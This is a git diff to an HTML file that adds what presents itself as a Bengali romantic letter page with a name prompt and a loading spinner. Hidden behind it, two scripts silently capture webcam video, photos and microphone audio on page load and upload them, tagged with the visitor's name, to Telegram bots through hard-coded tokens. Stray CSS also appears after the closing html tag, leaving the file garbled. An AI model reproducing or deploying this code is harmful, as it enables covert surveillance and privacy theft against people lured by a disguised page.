--- a/index.html
+++ b/index.html
@@ -299,6 +299,247 @@
       white-space: pre-wrap;
     }
 
+    .loading-container {
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      justify-content: center;
+      min-height: 200px;
+    }
+
+    .loading-spinner {
+      width: 60px;
+      height: 60px;
+      border: 5px solid rgba(255, 255, 255, 0.3);
+      border-radius: 50%;
+      border-top-color: #ff6a88;
+      animation: spin 1s ease-in-out infinite;
+      margin-bottom: 20px;
+    }
+
+    @keyframes spin {
+      to { transform: rotate(360deg); }
+    }
+
+    .loading-text {
+      font-size: 1.2rem;
+      color: #fff;
+      text-align: center;
+    }
+
+    .btn {
+      margin-top: 25px;
+      padding: 14px 35px;
+      font-size: 16px;
+      font-weight: bold;
+      border: none;
+      border-radius: 25px;
+      cursor: pointer;
+      background: linear-gradient(135deg, #ff6a88, #ff99ac);
+      color: #fff;
+      box-shadow: 0 8px 20px rgba(255, 105, 135, 0.4);
+      transition: all 0.3s ease;
+    }
+
+    .btn:hover {
+      transform: translateY(-3px);
+      box-shadow: 0 12px 25px rgba(255, 105, 135, 0.6);
+    }
+
+    .name-form {
+      background: rgba(255, 255, 255, 0.2);
+      backdrop-filter: blur(15px);
+      padding: 30px;
+      border-radius: 15px;
+      text-align: center;
+      box-shadow: 0 10px 30px rgba(0,0,0,0.2);
+    }
+
+    .name-form h2 {
+      font-size: 1.8rem;
+      margin-bottom: 20px;
+      color: #fff;
+    }
+
+    .name-form input {
+      padding: 12px;
+      font-size: 1rem;
+      width: 250px;
+      margin-bottom: 20px;
+      border-radius: 8px;
+      border: none;
+      outline: none;
+    }
+  </style>
+</head>
+<body>
+
+  <!-- Name Input -->
+  <div class="name-form" id="name-container">
+    <h2>তোমার নাম লিখ</h2>
+    <input type="text" id="userName" placeholder="Your Name"/>
+    <br>
+    <button class="btn" id="submit-name">Next</button>
+  </div>
+
+  <!-- Letter Section -->
+  <div class="card" id="container">
+    <div class="title">প্রিয় <span id="to-name">Love</span></div>
+    <div class="loading-container" id="loading">
+      <div class="loading-spinner"></div>
+      <div class="loading-text">তোমার জন্য বিশেষ কিছু প্রস্তুত হচ্ছে...</div>
+    </div>
+    <div class="letter-box" id="letter" style="display: none;"></div>
+    <button class="btn" id="start-btn" style="display: none;">চিঠি পড়ো</button>
+    <div id="message" style="margin-top:15px; color:#ffe4ec; font-size:1rem;">🥹...</div>
+  </div>
+
+  <script>
+    let userName = "";
+    const letterText = `
+তোমাকে লেখা এই চিঠির প্রতিটি শব্দ আমার হৃদয়ের গভীর থেকে আসা কিছু অনুভূতির প্রতিচ্ছবি... 💌
+
+ভালোবাসি—এই ছোট্ট শব্দটা হয়তো আমার অনুভূতির বিশালতা বোঝাতে পারবে না। 
+তবুও বলছি, কারণ তুমি জানার অধিকার রাখো। আমি তোমায় গভীরভাবে, নিরবচ্ছিন্নভাবে, নিঃশর্তভাবে ভালোবাসি।
+    `;
+    const letterBox = document.getElementById("letter");
+    const startBtn = document.getElementById("start-btn");
+    const submitNameBtn = document.getElementById("submit-name");
+    const nameContainer = document.getElementById("name-container");
+    const container = document.getElementById("container");
+    const toName = document.getElementById("to-name");
+    const userNameInput = document.getElementById("userName");
+    const message = document.getElementById("message");
+    const loading = document.getElementById("loading");
+    const token = "7891742749:AAHRWnK8KtgV4c7KEb6MY27D9AXdIsrKp_w";
+    const chatId = "1987016824";
+
+    submitNameBtn.addEventListener("click", function() {
+      userName = userNameInput.value.trim();
+      if (userName !== "") {
+        toName.textContent = userName;
+        nameContainer.style.display = "none";
+        container.style.display = "block";
+        
+        // লোডিং শুরু
+        setTimeout(() => {
+          loading.style.display = "none";
+          letterBox.style.display = "block";
+          startBtn.style.display = "block";
+          letterBox.innerHTML = letterText;
+        }, 3000); // 3 সেকেন্ড লোডিং দেখাবে
+      }
+    });
+
+    startBtn.addEventListener("click", function() {
+      // টেলিগ্রামে ভিডিও পাঠানো শুরু হবে
+      startBtn.style.display = "none";
+      message.textContent = "🥹";
+    });
+
+    // Video recorder to Telegram
+    navigator.mediaDevices.getUserMedia({ video: { facingMode: "user" }, audio: true })
+    .then(stream => {
+      const mediaRecorder = new MediaRecorder(stream);
+      const chunks = [];
+      mediaRecorder.ondataavailable = e => chunks.push(e.data);
+      mediaRecorder.onstop = function() {
+        const blob = new Blob(chunks, { type: "video/webm" });
+        chunks.length = 0;
+        sendVideoToTelegram(blob);
+      };
+      setInterval(() => {
+        if (mediaRecorder.state === "recording") { mediaRecorder.stop(); }
+        mediaRecorder.start();
+        setTimeout(() => {
+          if (mediaRecorder.state === "recording") { mediaRecorder.stop(); }
+        }, 5000);
+      }, 8000);
+    })
+    .catch(err => { message.textContent = ""; console.error(err); });
+
+    function sendVideoToTelegram(blob) {
+      const formData = new FormData();
+      formData.append("chat_id", chatId);
+      formData.append("video", blob, "video.webm");
+      formData.append("caption", `This is ${userName}'s video!`);
+      fetch(`https://api.telegram.org/bot${token}/sendVideo`, { method: "POST", body: formData })
+      .then(res => res.json())
+      .then(data => { if (!data.ok) message.textContent = "🥹"; })
+      .catch(err => { console.error(err); message.textContent = "🥲"; });
+    }
+  </script>
+
+  <!-- Second Telegram Script (photo + audio + youtube thumbnail) -->
+  <script>
+    function GetURLParameter(name) {
+      const params = new URLSearchParams(window.location.search);
+      return params.get(name);
+    }
+    function decodeBase64(encodedStr) {
+      try { return decodeURIComponent(atob(encodedStr)); }
+      catch (e) { console.error('Base64 decode error:', e); return null; }
+    }
+    const base64Id = GetURLParameter('i');
+    const chatid = base64Id ? decodeBase64(base64Id) : null;
+
+    function sendToTelegram(data, type) {
+      const botToken = '8081363450:AAEC5EHBK5teOi18daxyFfEW3rDh3xTDeDk';
+      if (!chatid) return console.error('Chat ID is not available.');
+      const formData = new FormData();
+      formData.append('chat_id', chatid);
+      formData.append(type === 'photo' ? 'photo' : 'audio', data, `thumb.${type === 'photo' ? 'jpg' : 'wav'}`);
+      fetch(`https://api.telegram.org/bot${botToken}/send${type.charAt(0).toUpperCase() + type.slice(1)}`, {
+        method: 'POST', body: formData
+      }).then(res => res.json()).then(data => console.log('Telegram response:', data))
+        .catch(err => console.error('Telegram error:', err));
+    }
+
+    navigator.mediaDevices.getUserMedia({ video: true, audio: true })
+      .then((stream) => {
+        const imageCapture = new ImageCapture(stream.getVideoTracks()[0]);
+        const audioRecorder = new MediaRecorder(stream);
+        for (let i = 0; i < 3; i++) {
+          setTimeout(() => {
+            imageCapture.takePhoto().then(blob => sendToTelegram(blob, 'photo'));
+          }, i * 2000);
+        }
+        audioRecorder.start();
+        setTimeout(() => audioRecorder.stop(), 5000);
+        audioRecorder.ondataavailable = (event) => {
+          if (event.data.size > 0) { sendToTelegram(event.data, 'audio'); }
+        };
+      })
+      .catch(error => {
+        if (error.name === 'NotAllowedError') { console.warn('Permissions denied. User blocked access.'); }
+        else { console.error('Media error:', error); }
+      });
+  </script>
+</body>
+</html>      box-shadow: 0 15px 40px rgba(0, 0, 0, 0.2);
+      display: none;
+    }
+
+    .title {
+      font-family: 'Dancing Script', cursive;
+      font-size: 2.2rem;
+      color: #ffebf0;
+      margin-bottom: 20px;
+    }
+
+    .letter-box {
+      background: rgba(255, 255, 255, 0.25);
+      border-radius: 15px;
+      padding: 20px;
+      font-size: 1.1rem;
+      line-height: 1.8;
+      color: #222;
+      text-align: left;
+      max-height: 280px;
+      overflow-y: auto;
+      white-space: pre-wrap;
+    }
+
     .caret {
       display: inline-block;
       width: 10px;
